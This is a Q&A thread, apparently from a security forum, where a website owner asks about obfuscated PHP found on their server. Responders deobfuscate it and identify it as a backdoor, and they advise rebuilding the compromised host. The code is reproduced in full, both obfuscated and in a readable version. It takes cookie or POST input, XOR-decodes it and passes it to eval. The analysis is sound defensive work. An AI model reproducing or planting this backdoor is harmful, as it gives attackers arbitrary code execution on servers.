I need to decode this suspicious code and explain what it is doing?

Question

    $llkas = '-tl#o3s1vnHr_ue*2b\'8c6mx9fya0ip47kgd';
    $spvgazs = Array();
    $spvgazs[] = $llkas[10].$llkas[15];
    $spvgazs[] = $llkas[19].$llkas[19].$llkas[16].$llkas[16].$llkas[27].$llkas[27].$llkas[5].$llkas[19].$llkas[0].$llkas[25].$llkas[20].$llkas[14].$llkas[16].$llkas[0].$llkas[31].$llkas[24].$llkas[24].$llkas[16].$llkas[0].$llkas[19].$llkas[24].$llkas[21].$llkas[32].$llkas[0].$llkas[28].$llkas[24].$llkas[24].$llkas[21].$llkas[7].$llkas[17].$llkas[27].$llkas[27].$llkas[28].$llkas[28].$llkas[31].$llkas[35];
    $spvgazs[] = $llkas[3];
    $spvgazs[] = $llkas[20].$llkas[4].$llkas[13].$llkas[9].$llkas[1];
    $spvgazs[] = $llkas[6].$llkas[1].$llkas[11].$llkas[12].$llkas[11].$llkas[14].$llkas[30].$llkas[14].$llkas[27].$llkas[1];
    $spvgazs[] = $llkas[14].$llkas[23].$llkas[30].$llkas[2].$llkas[4].$llkas[35].$llkas[14];
    $spvgazs[] = $llkas[6].$llkas[13].$llkas[17].$llkas[6].$llkas[1].$llkas[11];
    $spvgazs[] = $llkas[27].$llkas[11].$llkas[11].$llkas[27].$llkas[26].$llkas[12].$llkas[22].$llkas[14].$llkas[11].$llkas[34].$llkas[14];
    $spvgazs[] = $llkas[6].$llkas[1].$llkas[11].$llkas[2].$llkas[14].$llkas[9];
    $spvgazs[] = $llkas[30].$llkas[27].$llkas[20].$llkas[33];


    foreach ($spvgazs[7]( $_COOKIE, $_POST ) as $pxajrr => $aesghqe ){
        function lscwszf($spvgazs, $pxajrr, $hgfxl){
            return $spvgazs[6]($spvgazs[4]($pxajrr . $spvgazs[1], ($hgfxl / $spvgazs[8]($pxajrr)) + 1), 0, $hgfxl);
        }

        function rrxhm($spvgazs, $aaoyvhu){
            return @$spvgazs[9]($spvgazs[0], $aaoyvhu);
        }
        function hccqcjz($spvgazs, $aaoyvhu){$bgukyrk = $spvgazs[3]($aaoyvhu) % 3;
            if (!$bgukyrk) {eval($aaoyvhu[1]($aaoyvhu[2]));
                exit();
            }
        }

        $aesghqe = rrxhm($spvgazs, $aesghqe);
        hccqcjz($spvgazs, $spvgazs[5]($spvgazs[2], $aesghqe ^ lscwszf($spvgazs, $pxajrr, $spvgazs[8]($aesghqe))));
    }

it is not a duplicate question of How do I de-obfuscate the code? i wanted someone to explain me what this code does? and ones who keeps marking this as duplicate shud first read the answers there, that doesnt explain anything what i want as answer.

Without trying to make it readable, it contains $_COOKIE, $POST, and eval. It's highly likely that it does anything and everything, depending on how the attacker calls it. — user155462, Mar 27 '18 at 11:59
Hi Amanz, what's the background here? This question doesn't make a lot of sense. Why do you need to decode this? Did you try the regular stack-overflow forum where they talk about coding? What you're showing us is a snipper of obfuscated code. Why should this be considered suspicious rather than a piece of code found on a website? — sir_k, Mar 27 '18 at 12:01
@FlorinCoada While it's not written here, such questions here usually are because the code was found on the users own website, and the user has no idea how it suddenly got there. ... Anyways, with this POST, eval, and obfuscation, it's 99.99% malware. Amanz, let me guess, you're using Wordpress? — user155462, Mar 27 '18 at 12:09
@user155462 it could be, or the ask might be to reverse engineer someone's intentionally obfuscated code (which is off topic). I think a coding question without security context is not a good fit for this forum and it will not get an answer. — sir_k, Mar 27 '18 at 12:13
@user155462 and Florin, thanks for quick reply. i am not using wordpress. this was found on a website which in on shared hosting. — Amanz, Mar 27 '18 at 13:22
@Amanz The question is not an exact duplicate, and it was closed because deobfuscation and code-analysis requests are off-topic. The only reason it was marked as a duplicate is because the other answer is a _canonical answer_. That is, all "how do I decode this" questions will be closed and linked to that one. It provides a good, general answer explaining how you can do this yourself. — forest, Mar 28 '18 at 09:40

score 6 · Accepted Answer · answered Mar 27 '18 at 12:45

6

Your code a bit more readable:

//for external input...
foreach(array_merge($_COOKIE, $_POST) as $k => $v) { 

    //convert hex to normal text, no warning if not hex
    $v =  @pack('H*', $v);

    //do some crazy string modification which makes it possible that the direct input is not detectable as malware etc.
    //after this lines, it's real code (at least a part of it is)
    $v = $v ^ substr(str_repeat($k . '8822aa38-fce2-4992-8967-09961baa004d', (strlen($v) / strlen($k)) + 1), 0, strlen($v));

    //split the result into several lines
    $v = explode('#', $v);

    $cnt = count($v) % 3;
    if ($cnt == 0) {
        //only if the line count is a multiple of 3, eg. as safeguard to filter out input not from the attacker
        //(which is highly likely something else, after the processing before)

        //execute the function specified in line 2 with the parameter of line 3, ignore the other lines
        //line 2 can be eval too, so line 3 can be any code, which will be executed on the server.
        eval($v[1]($v[2]));
        exit();

    }
}

As said in the comments, it is malware. More specific, it is a hidden possibility for someone (human or bot) to execute any custom PHP code on your server.
Someone managed to get this on your server, and this is the easy way to come back later.

answered Mar 27 '18 at 12:45

user155462

431
2
3

Any speculation as to how this might have gotten on his server? – Neil Weicher Mar 27 '18 at 12:49
There are many possibilites - common ones for for small targets often are rooted in (in no specific order) missing updates etc. on the server, wrong configuration (eg. letting everyone seeing passwords etc.etc.), and of course using bad software (like Wordpress and plugins, etc.). – user155462 Mar 27 '18 at 12:51
Thanks alot @user155462. but can you help me bit more by giving example how this code will be used by hacker and what can i do to prevent it. coz these codes keep coming back. – Amanz Mar 27 '18 at 13:24
1

then flatten your server. – Marcus Müller Mar 27 '18 at 13:54
1

This literally gives any external person full access to your server. Your server is compromised and very likely backdoored by now in multiple ways, and since you say these individual backdoors are self-restoring, it's actually highly likely that your server is currently actively doing nefarious things or is held "active" to soon do such things. **Not taking your server offline would be immensely irresponsible.** – Marcus Müller Mar 27 '18 at 13:55
So, you really don't need any examples. Anything *you* can do on the server, the attacker can, too, and they are likely to try and spread that access to users of your server. You must not trust any credentials you entered there anymore (you must change a lot of passwords, inform all users of your server their passwords and data has been compromised), nor must you ever execute code downloaded from said server. Your server is compromised and must be built again, from *clean slate* (not by copying over very likely already compromised backup). Sorry, you came too late. – Marcus Müller Mar 27 '18 at 13:57
thanks to all of u guys for helping me. its all due to my seniors writing marvelous code which even a 5 year kid can hack by using simplest sql injections. i did repaired all of the instances but as u said: _its alredy too late_ i am gonna purchase malware removal from hosting. lets see how that goes. – Amanz Mar 28 '18 at 05:08

I need to decode this suspicious code and explain what it is doing?

1 Answers1

Linked